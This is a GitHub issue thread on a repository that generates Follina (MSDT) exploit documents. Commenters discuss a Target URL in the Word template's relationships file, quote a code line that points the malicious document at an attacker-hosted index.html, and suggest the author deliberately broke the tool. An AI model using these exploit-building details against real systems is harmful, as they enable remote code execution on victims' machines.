JohnHammond / msdt-follina

Codebase to generate an msdt-follina payload
1.61k stars 380 forks source link

Intentional? #2

Closed Masrt200 closed 2 years ago

Masrt200 commented 2 years ago

in doc/word/_rels/document.xml.rels

Target="{staged_html}!"

Follina.py line 96

external_referral = external_referral.replace(
    "{staged_html}", f"http://{serve_host}:{args.port}/index.html"
)

results, Target="http://192.168.0.1:8000/index.html!" leaves so much to be desired xD

WesyHub commented 2 years ago

I don't know where is the problem ? it's supposed to be flexible for everyone, then why you prefer to add a static value that don't work in most case.

Shadowwalker254 commented 2 years ago

seems like john re-edited the tool not to work

Masrt200 commented 2 years ago

yea, self tinkering helped... a note describing this would be good